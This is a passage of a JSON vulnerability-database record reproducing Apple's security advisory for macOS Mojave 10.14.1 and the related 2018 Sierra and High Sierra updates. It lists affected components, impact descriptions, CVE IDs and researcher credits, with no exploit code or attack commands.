"CVE-2018-4417", "CVE-2018-4411", "CVE-2018-4341", "CVE-2018-8779", "CVE-2018-3639", "CVE-2018-4291", "CVE-2018-6914", "CVE-2018-4126", "CVE-2018-3640", "CVE-2018-4422", "CVE-2018-4421"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS Mojave 10.14.1, Security Update 2018-002 High Sierra, Security Update 2018-005 Sierra\n\nReleased October 30, 2018\n\n**afpserver**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: A remote attacker may be able to attack AFP servers through HTTP clients\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2018-4295: Jianjun Chen (@whucjj) from Tsinghua University and UC Berkeley\n\n**AppleGraphicsControl**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4410: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**AppleGraphicsControl**\n\nAvailable for: macOS High Sierra 10.13.6\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2018-4417: Lee of the Information Security Lab Yonsei University working with Trend Micro's Zero Day Initiative\n\n**APR**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: Multiple buffer overflow issues existed in Perl\n\nDescription: Multiple issues in Perl were addressed with improved memory handling.\n\nCVE-2017-12613: Craig Young of Tripwire VERT\n\nCVE-2017-12618: Craig Young of Tripwire VERT\n\nEntry updated February 15, 2019\n\n**ATS**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4411: lilang wu moony Li of Trend Micro working with Trend Micro's Zero Day Initiative\n\n**ATS**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2018-4308: Mohamed Ghannam (@_simo36)\n\n**Automator**\n\nAvailable for: macOS Mojave 10.14\n\nImpact: A malicious application may be able to access restricted files\n\nDescription: This issue was addressed by removing additional entitlements.\n\nCVE-2018-4468: Jeff Johnson of underpassapp.com\n\nEntry added February 15, 2019\n\n**CFNetwork**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4126: Bruno Keith (@bkth_) working with Trend Micro's Zero Day Initiative\n\n**CoreAnimation**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4415: Liang Zhuo working with Beyond Security\u2019s SecuriTeam Secure Disclosure\n\n**CoreCrypto**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: An attacker may be able to exploit a weakness in the Miller-Rabin primality test to incorrectly identify prime numbers\n\nDescription: An issue existed in the method for determining prime numbers. This issue was addressed by using pseudorandom bases for testing of primes.\n\nCVE-2018-4398: Martin Albrecht, Jake Massimo and Kenny Paterson of Royal Holloway, University of London, and Juraj Somorovsky of Ruhr University, Bochum\n\n**CoreFoundation**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4412: The UK's National Cyber Security Centre (NCSC)\n\n**CUPS**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: In certain configurations, a remote attacker may be able to replace the message content from the print server with arbitrary content\n\nDescription: An injection issue was addressed with improved validation.\n\nCVE-2018-4153: Michael Hanselmann of hansmi.ch\n\n**CUPS**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An attacker in a privileged position may be able to perform a denial of service attack\n\nDescription: A denial of service issue was addressed with improved validation.\n\nCVE-2018-4406: Michael Hanselmann of hansmi.ch\n\n**Dictionary**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: Parsing a maliciously crafted dictionary file may lead to disclosure of user information\n\nDescription: A validation issue existed which allowed local file access. This was addressed with input sanitization.\n\nCVE-2018-4346: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**Dock**\n\nAvailable for: macOS Mojave 10.14\n\nImpact: A malicious application may be able to access restricted files\n\nDescription: This issue was addressed by removing additional entitlements.\n\nCVE-2018-4403: Patrick Wardle of Digita Security\n\nEntry updated February 15, 2019\n\n**dyld**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14, macOS Sierra 10.12.6\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2018-4423: Youfu Zhang of Chaitin Security Research Lab (@ChaitinTech)\n\nEntry updated November 16, 2018\n\n**EFI**\n\nAvailable for: macOS High Sierra 10.13.6\n\nImpact: Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis\n\nDescription: An information disclosure issue was addressed with a microcode update. This ensures that older data read from recently-written-to addresses cannot be read via a speculative side-channel.\n\nCVE-2018-3639: Jann Horn (@tehjh) of Google Project Zero (GPZ), Ken Johnson of the Microsoft Security Response Center (MSRC)\n\n**EFI**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: A local user may be able to modify protected parts of the file system\n\nDescription: A configuration issue was addressed with additional restrictions.\n\nCVE-2018-4342: Timothy Perfitt of Twocanoes Software\n\n**Foundation**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: Processing a maliciously crafted text file may lead to a denial of service\n\nDescription: A denial of service issue was addressed with improved validation.\n\nCVE-2018-4304: jianan.huang (@Sevck)\n\n**Grand Central Dispatch**\n\nAvailable for: macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4426: Brandon Azad\n\n**Heimdal**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4331: Brandon Azad\n\n**Hypervisor**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: Systems with microprocessors utilizing speculative execution and address translations may allow unauthorized disclosure of information residing in the L1 data cache to an attacker with local user access with guest OS privilege via a terminal page fault and a side-channel analysis\n\nDescription: An information disclosure issue was addressed by flushing the L1 data cache at the virtual machine entry.\n\nCVE-2018-3646: Baris Kasikci, Daniel Genkin, Ofir Weisse, and Thomas F. Wenisch of University of Michigan, Mark Silberstein and Marina Minkin of Technion, Raoul Strackx, Jo Van Bulck, and Frank Piessens of KU Leuven, Rodrigo Branco, Henrique Kawakami, Ke Sun, and Kekai Hu of Intel Corporation, Yuval Yarom of The University of Adelaide\n\n**Hypervisor**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption vulnerability was addressed with improved locking.\n\nCVE-2018-4242: Zhuo Liang of Qihoo 360 Nirvan Team\n\n**ICU**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14, macOS Sierra 10.12.6\n\nImpact: Processing a maliciously crafted string may lead to heap corruption\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4394: Erik Verbruggen of The Qt Company\n\nEntry updated November 16, 2018\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4334: Ian Beer of Google Project Zero\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.6\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2018-4396: Yu Wang of Didi Research America\n\nCVE-2018-4418: Yu Wang of Didi Research America\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4350: Yu Wang of Didi Research America\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Mojave 10.14\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2018-4421: Tyler Bohan of Cisco Talos\n\nEntry added December 21, 2018\n\n**IOGraphics**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4422: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**IOHIDFamily**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4408: Ian Beer of Google Project Zero\n\nEntry updated August 1, 2019\n\n**IOKit**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4402: Proteas of Qihoo 360 Nirvan Team\n\n**IOKit**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: A malicious application may be able to break out of its sandbox\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4341: Ian Beer of Google Project Zero\n\nCVE-2018-4354: Ian Beer of Google Project Zero\n\n**IOUserEthernet**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4401: Apple\n\n**IPSec**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4371: Tim Michaud (@TimGMichaud) of Leviathan Security Group\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed by removing the vulnerable code.\n\nCVE-2018-4420: Mohamed Ghannam (@_simo36)\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.6\n\nImpact: A malicious application may be able to leak sensitive user information\n\nDescription: An access issue existed with privileged API calls. This issue was addressed with additional restrictions.\n\nCVE-2018-4399: Fabiano Anemone (@anoane)\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4340: Mohamed Ghannam (@_simo36)\n\nCVE-2018-4419: Mohamed Ghannam (@_simo36)\n\nCVE-2018-4425: cc working with Trend Micro's Zero Day Initiative, Juwei Lin (@panicaII) of Trend Micro working with Trend Micro's Zero Day Initiative\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: Mounting a maliciously crafted NFS network share may lead to arbitrary code execution with system privileges\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4259: Kevin Backhouse of Semmle and LGTM.com\n\nCVE-2018-4286: Kevin Backhouse of Semmle and LGTM.com\n\nCVE-2018-4287: Kevin Backhouse of Semmle and LGTM.com\n\nCVE-2018-4288: Kevin Backhouse of Semmle and LGTM.com\n\nCVE-2018-4291: Kevin Backhouse of Semmle and LGTM.com\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2018-4413: Juwei Lin (@panicaII) of TrendMicro Mobile Security Team\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An attacker in a privileged network position may be able to execute arbitrary code\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2018-4407: Kevin Backhouse of Semmle Ltd.\n\n**Kernel**\n\nAvailable for: macOS Mojave 10.14\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved size validation.\n\nCVE-2018-4424: Dr. Silvio Cesare of InfoSect\n\n**LinkPresentation**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: Processing a maliciously crafted text message may lead to UI spoofing\n\nDescription: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.\n\nCVE-2018-4187: Roman Mueller (@faker_), Zhiyang Zeng (@Wester) of Tencent Security Platform Department\n\nEntry added April 3, 2019\n\n**Login Window**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: A local user may be able to cause a denial of service\n\nDescription: A validation issue was addressed with improved logic.\n\nCVE-2018-4348: Ken Gannon of MWR InfoSecurity and Christian Demko of MWR InfoSecurity\n\n**Mail**\n\nAvailable for: macOS Mojave 10.14\n\nImpact: Processing a maliciously crafted mail message may lead to UI spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4389: Dropbox Offensive Security Team, Theodor Ragnar Gislason of Syndis\n\n**mDNSOffloadUserClient**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4326: an anonymous researcher working with Trend Micro's Zero Day Initiative, Zhuo Liang of Qihoo 360 Nirvan Team\n\n**MediaRemote**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: An access issue was addressed with additional sandbox restrictions.\n\nCVE-2018-4310: CodeColorist of Ant-Financial LightYear Labs\n\n**Microcode**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: Systems with microprocessors utilizing speculative execution and that perform speculative reads of system registers may allow unauthorized disclosure of system parameters to an attacker with local user access via a side-channel analysis\n\nDescription: An information disclosure issue was addressed with a microcode update. This ensures that implementation specific system registers cannot be leaked via a speculative execution side-channel.\n\nCVE-2018-3640: Innokentiy Sennovskiy from BiZone LLC (bi.zone), Zdenek Sojka, Rudolf Marek and Alex Zuepke from SYSGO AG (sysgo.com)\n\n**NetworkExtension**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: Connecting to a VPN server may leak DNS queries to a DNS proxy\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2018-4369: an anonymous researcher\n\n**Perl**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: Multiple buffer overflow issues existed in Perl\n\nDescription: Multiple issues in Perl were addressed with improved memory handling.\n\nCVE-2018-6797: Brian Carpenter\n\n**Ruby**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: Multiple issues in Ruby were addressed in this update.\n\nCVE-2017-0898\n\nCVE-2017-10784\n\nCVE-2017-14033\n\nCVE-2017-14064\n\nCVE-2017-17405\n\nCVE-2017-17742\n\nCVE-2018-6914\n\nCVE-2018-8777\n\nCVE-2018-8778\n\nCVE-2018-8779\n\nCVE-2018-8780\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: Processing a maliciously crafted S/MIME signed message may lead to a denial of service\n\nDescription: A validation issue was addressed with improved logic.\n\nCVE-2018-4400: Yukinobu Nagayasu of LAC Co., Ltd.\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: A local user may be able to cause a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2018-4395: Patrick Wardle of Digita Security\n\n**Spotlight**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4393: Lufeng Li\n\n**Symptom Framework**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2018-4203: Bruno Keith (@bkth_) working with Trend Micro's Zero Day Initiative\n\n**Wi-Fi**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: An attacker in a privileged position may be able to perform a denial of service attack\n\nDescription: A denial of service issue was addressed with improved validation.\n\nCVE-2018-4368: Milan Stute and Alex Mariotto of Secure Mobile Networking Lab at Technische Universit\u00e4t Darmstadt\n\n\n\n## Additional recognition\n\n**Calendar**\n\nWe would like to acknowledge Matthew Thomas of Verisign for their assistance.\n\nEntry updated February 15, 2019\n\n**coreTLS**\n\nWe would like to acknowledge Eyal Ronen (Weizmann Institute), Robert Gillham (University of Adelaide), Daniel Genkin (University of Michigan), Adi Shamir (Weizmann Institute), David Wong (NCC Group), and Yuval Yarom (University of Adelaide and Data61) for their assistance.\n\nEntry added December 12, 2018\n\n**iBooks**\n\nWe would like to acknowledge Sem Voigtl\u00e4nder of Fontys Hogeschool ICT for their assistance.\n\n**Kernel**\n\nWe would like to acknowledge Brandon Azad for their assistance.\n\n**LaunchServices**\n\nWe would like to acknowledge Alok Menghrajani of Square for their assistance.\n\n**Quick Look**\n\nWe would like to acknowledge lokihardt of Google Project Zero for their assistance.\n\n**Security**\n\nWe would like to acknowledge Marinos Bernitsas of Parachute for their assistance.\n\n**Terminal**\n\nWe would like to acknowledge Federico Bento for their assistance.\n\nEntry updated February 3, 2020\n\n**Time Machine**\n\nWe would like to acknowledge Matthew Thomas of Verisign for their assistance.\n\nEntry added February 15, 2019\n", "edition": 3, "modified": "2020-07-27T08:14:47", "published": "2020-07-27T08:14:47", "id": "APPLE:HT209193", "href": "https://support.apple.com/kb/HT209193", "title": "About the security content of macOS Mojave 10.14.1, Security Update 2018-002 High Sierra, Security Update 2018-005 Sierra - Apple Support", "type": "apple", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}